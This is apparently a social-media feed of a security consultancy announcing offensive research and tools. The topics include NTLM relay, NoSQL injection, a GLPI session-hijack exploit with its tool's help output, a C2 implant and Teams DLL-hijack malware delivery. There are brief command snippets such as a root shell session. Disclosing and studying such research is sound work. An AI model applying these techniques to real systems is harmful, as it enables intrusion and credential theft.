Lightnews — Scholar-powered news

Reposted by SensePost

💥 leonjza @leonjza.bsky.social · Sep 10

I've been hacking on a new Windows Named Pipe tool called PipeTap which helps analyse named pipe communications. Born out of necessity while doing some vulnerability research on a target, its been super useful in reversing it's fairly complex protocol. :)

The proxy view for PipeTap, a Windows Named Pipe Analysis Tool

2 7 7

SensePost @sensepost.com · Jul 31

Reverse engineering Microsoft’s SQLCMD.exe to implement Channel Binding support for MSSQL into Impacket’s mssqlclient.py. Storytime from Aurelien (@Defte_ on the bird site), including instructions for reproducing the test environment yourself.

sensepost.com/blog/2025/a-...

A screenshot of two windows. The top is a view of the Microsoft SQL management GUI showing that “Extended Protection” is enabled for NTLM authentication. The bottom is a terminal showing an invocation of Impacket’s mssqlclient.py successfully connecting using channel binding.

6 10

SensePost @sensepost.com · Jun 26

Adriaan was struggling to get an interactive shell on the *nix application server he had popped, so he wrote a turn-based mini binary to give you a semi-interactive shell in restrictive environments. Writeup & code are at
 👇
 sensepost.com/blog/2025/no...

A screenshot of the tool in action firing up an ssh session to another host. ./shellnot --daemon &
./shellnot --session 1 --input "ssh root@2.domain.com"
./shellnot --session 1 --output
ssh root@2.domain.com

root@2.domain.com”s password:
./shellnot --session 1 --input "toor"
./shellnot --session 1 --output

Last login: Sat May 24 16:45:40 2025 from 10.0.0.2
[root@localhost ~]$ ?
./shellnot --session 1 --input "id"
./shellnot --session 1 --output
id
uid=1001(root) gid=1001(root) groups=1001(root),970(docker),998(wheel)

4 11

Reposted by SensePost

💥 leonjza @leonjza.bsky.social · Jun 17

Quite stoked to be speaking at @defcon.bsky.social 33 this year, presenting: "7 Vulns in 7 Days: Breaking Bloatware Faster Than It’s Built".

Reversing, exploits, disclosure pain - it has it all, and it's going to be fun! 💥

See ya soon Vegas. ☀️

Email subject stating: "Congrats! Your DEF CON 33 Submission is accepted!"

1 4 13

Reposted by SensePost

Felipe Molina @felmoltor.me · Jun 11

I was talking with someone about dependency confusion and suply chain attacks and I was confused myself with the feasibility of doing this in 2025, so I decided to take a practical aproach and create my own tool 🔨 to detect Orphan and Mispelled packages 📦: sensepost.com/blog/2025/de...

SensePost | Depscanner: find orphaned packages before the bad guys do

Leaders in Information Security

sensepost.com

3 5

SensePost @sensepost.com · Jun 4

Did we mention all this is done in the cloud with access to the labs available after the training for you to keep up practise post Vegas.

Dominic White @singe.bsky.social · Jun 4

Wifi hacking can be a useful tool, but people are out here grinding on WPA2 handshake cracking tutorials & menu driven attack tooling. When we built the 3rd and latest iteration of the wifi hacking course for BlackHat - we did it to show what really works and how it really works. 1/7

A DALL-E generated image of a hooded person behind a computer with a large glowing wifi symbol on it. In the background are neon posters with the words WPA2 handshake cracking, PEAP relay access, certificate bypass and BLACK HAT. The style is neon cyberpunk.

1

SensePost @sensepost.com · Apr 17

After identifying a mistake relating to NTLMv1 being enabled in the test environment, the blog has been updated with an errata section.

1

SensePost @sensepost.com · Apr 17

Unsatisfied with merely relying on reFlutter to do its magic, Jacques dove deep to understand how Flutter's SSL pinning in Android works, and how to intercept it with Frida.

sensepost.com/blog/2025/in...

A screenshot of code from BoringSSL's certificate validation function.

3 3

SensePost @sensepost.com · Apr 14

The S is for Security. How to use WinRMS as a solid NTLM relay target, and why it’s less secure than WinRM over HTTP.

writeup: sensepost.com/blog/2025/is...

PR to impacket:
github.com/fortra/impac...

Demo: youtu.be/3mG2Ouu3Umk

WinRMS Relaying

YouTube video by Sense Post

youtu.be

1 10 11

Reposted by SensePost

💥 leonjza @leonjza.bsky.social · Mar 29

Whipped together a SOCKS5-over-any-transport feature today for the c2 & implant used in @sensepost.com purple teaming / emulation exercises.

Here I have a cURL request, over an ICMP channel, funnelling HTTP requests in and out via our implant :D

Fun! 😄🔥

C2 console logs showing a SOCKS5 proxy having started on port 1800

Implant logs showing an ICMP channel enabled, HTTP channel disabled and a proxy server started targeting the ICMP channel.

cURL configured to use a SOCKS5 proxy (pointing at the C2), targeting an IP on the other side of the implant.

4 15

Reposted by SensePost

Orange @orange.com · Mar 26

What can be done to prevent phishing attacks? We speak to cyberdefence expert @rodriguelebayon.bsky.social, Head of Global CERT at Orange Cyberdefense, who tells us more about the growing problem and what we can do to stop it.
👉See the interview: www.france24.com/en/tv-shows/...

Entre Nous - Fighting cybercrime: What can be done to prevent phishing attacks?

Have you ever received a phone call from a number you don't know, offering you a job that's too good to be true? Or received a link to pay for a package that's supposedly in your name? In many of thos...

www.france24.com

2 4

SensePost @sensepost.com · Mar 24

Dropping Teams malware via the browser’s cache - part II of Aurélien’s Browser Cache Smuggling covers his Insomni’hack talk with end to end weaponisation sensepost.com/blog/2025/br...

Demo: youtu.be/tIveWYfYcCI

$A screenshot from the demo video on YouTube showing the final state. There are four windows. Firefox open on an innocent looking page with the heading “Socrates: The Father of Western Philosophy”. Below it is a PowerShell terminal that was used to find the malicious DLL in the browser’s cache, and move it to c:\users\windev\appdata\local\Microsoft\Teams\current\VERSION.dll On the right is process explorer showing Teams running as normal with no malicious subprocess. Lastly the bottom window is a cmd terminal showing the reverse shell having connected and giving access to the command line of the victim host.$

2 9

SensePost @sensepost.com · Mar 21

GLPI (popular in France & Brazil) versions 9.5.0-10.0.16 allow hijacking sessions of authenticated users remotely. The details & process of discovering the vulnerability is detailed by @GuilhemRioux here:
sensepost.com/blog/2025/le...

Tooling: github.com/Orange-Cyber...

Demo: youtu.be/OTaCV4-6qHE

Screenshot from the YouTube POC showing output from the tool highlighting that an instance is vulnerable

› glpwnme -t http://localhost -e leakymetry --infos
CVE_2024_50339
CVSS: 9.3/10
Author: RIOUX Guilhem
Privileges required: Unauthenticated
Vulnerable from Version 9.5.0 and strictly below 10.0.17
Description:
This exploit allows you to recover the telemetry of GLPI. It Contains the whole informations about the target architecture / versions.

Usage:
Add -0 show_all=1 to display urls accessible for enumeration

Please note that this exploit make a request to the update DB
This options is designed originally to help a migration of the SQL DB from old versions
This migration is harmless, and is triggered only if the migration file has been explicitly downloaded

Side effect:
Leakymetry might disable the plugins in use

Exploit is Dangerous
Orange Cyberdefense

4 3

Reposted by SensePost

SensePost @sensepost.com · Mar 19

Using frida-trace to hook thousands of methods in one go and get clean, readable output for large, obfuscated mobile apps 📲. Another post from Reino’s to level up your dynamic analysis: sensepost.com/blog/2025/us...

Using & improving frida-trace
Reading time ~17 min
Posted by Reino Mostert on 19 March 2025
Categories: Frida, Mobile
TL;DR In this blog I want to show you how useful frida-trace can be at hooking thousands of methods at a time. I also wrote some scripts for improving its output a bit.

6 9

SensePost @sensepost.com · Mar 19

Using frida-trace to hook thousands of methods in one go and get clean, readable output for large, obfuscated mobile apps 📲. Another post from Reino’s to level up your dynamic analysis: sensepost.com/blog/2025/us...

6 9

SensePost @sensepost.com · Mar 15

The first part can be found here bsky.app/profile/sens...

SensePost @sensepost.com · Mar 11

A look at some of the trickier NoSQL injection scenarios from Reino. With ways of manipulating the query to deal with pre/post conditions successfully sensepost.com/blog/2025/ge...

(v3 of this skeet because there's no edit button and I need a proof reader)

Syntax injection into the JSON query filter (New Stuff)

In this case, the developers are using string concatenation, or more likely string interpolation to construct the query filter, before making it into a JSON object, and passing it to MongoDB.

We can thus add in our own query conditions. This is a bit of a game changer from operator injection, since we can now query on the fields we want, instead of being stuck inside an existing field.

2

SensePost @sensepost.com · Mar 15

The second part just went up bsky.app/profile/sens...

SensePost @sensepost.com · Mar 15

Reino takes his NoSQL injection series a bit further with (maybe) new techniques for more efficient error based NoSQL injections in this follow up post: sensepost.com/blog/2025/no...

NoSQL error-based injection
Reading time ~6 min
Posted by Reino Mostert on 15 March 2025
Categories: Database, Nosql injection, Injection, Nosql
TL;DR How to do NoSQL error-based injection
In this second blog post on NoSQL injection, I discuss how to do error-based injection. I think this might be a novel approach – at least my Google search-fu isn’t finding anything.

3

SensePost @sensepost.com · Mar 15

Reino takes his NoSQL injection series a bit further with (maybe) new techniques for more efficient error based NoSQL injections in this follow up post: sensepost.com/blog/2025/no...

1 2 5

Reposted by SensePost

Dominic White @singe.bsky.social · Mar 13

Some great research writeups and tool releases hitting the @sensepost.com blog and GitHub the last few days:

Capchan – Solving CAPTCHA with Image Classification
Reading time: ~34 min
Posted by adriaan.bosch on 13 March 2025
Categories: Ai, Ctf, Neural-nets, Tool

Getting rid of pre- and post-conditions in NoSQL injections
Reading time: ~10 min
Posted by Reino Mostert on 11 March 2025
Categories: Database, Nosql injection, Injection, Nosql

goLAPS
Reading time: ~3 min
Posted by Felipe Molina on 10 March 2025
Categories: Golang, Laps, Sensecon

Diving Into AD CS: Exploring Some Common Error Messages
Reading time: ~26 min
Posted by Jacques Coertze on 07 March 2025
Categories: Active directory, Adcs, Certificates, Internals, Windows, Certificate

InvokeADCheck – A PowerShell Module for Assessing Active Directory
Reading time: ~5 min
Posted by niels.hofland on 06 March 2025
Categories: Active directory, Automation, Powershell, Tool

PsExec’ing the right way and why zero trust is mandatory
Reading time: ~20 min
Posted by aurelien.chalot on 10 February 2025
Categories: Psexec, Sensecon, Tools

3 6

SensePost @sensepost.com · Mar 13

Want a hacker's introduction to using neural networks to create a tool to bypass CAPTCHAs? Adriaan's got you.

Writeup: sensepost.com/blog/2025/ca...

Accompanying training/classifying tool capchan github.com/sensepost/ca...

A screenshot from the README of the capuchin tool. It has terminal output showing the help menu of the tool. It has an ASCII art Sigmoid and ReLU xy graph in varying colours. The menu says "Choose the type of project below (use arrow keys) 1 New Model 2 Start PoC 3 Help Page. Underneath the terminal output the readme says:
Creates and trains a model based on provided greyscale images
Uses greyscale model against other images to determine image contents

5 10

SensePost @sensepost.com · Mar 11

A look at some of the trickier NoSQL injection scenarios from Reino. With ways of manipulating the query to deal with pre/post conditions successfully sensepost.com/blog/2025/ge...

(v3 of this skeet because there's no edit button and I need a proof reader)

1 2 5

SensePost @sensepost.com · Mar 10

One part learning some golang, another part having an exe to manipulate LAPS passwords remotely, in this post @felmoltor.me introduces goLAPS.

github.com/sensepost/go...

sensepost.com/blog/2025/go...

github.com

1 1 4

SensePost @sensepost.com · Mar 7

Attacks against AD CS are de rigueur these days, but sometimes a working attack doesn’t work somewhere else, and the inscrutable error messages are no help. Jacques replicated the most infuriating and explains what’s happening under the hood in this post: sensepost.com/blog/2025/di...

SensePost | Diving into ad cs: exploring some common error messages

Leaders in Information Security

sensepost.com

6 6

SensePost @sensepost.com · Mar 6

Want some handy powershell scripts to make your AD auditing life easier, Niels has your back with InvokeADCheck. Includes easy to add module system as well as consistent output and excel exports.

sensepost.com/blog/2025/in...

4 5

SensePost @sensepost.com · Feb 11

Instead of relying on RemCom, what if we had a python client to interact with the latest, Microsoft signed PSExec? In this post Aurélien details how he and the team did exactly this, including a tool, some PSExec internals and detection opportunities!

sensepost.com/blog/2025/ps...

5 6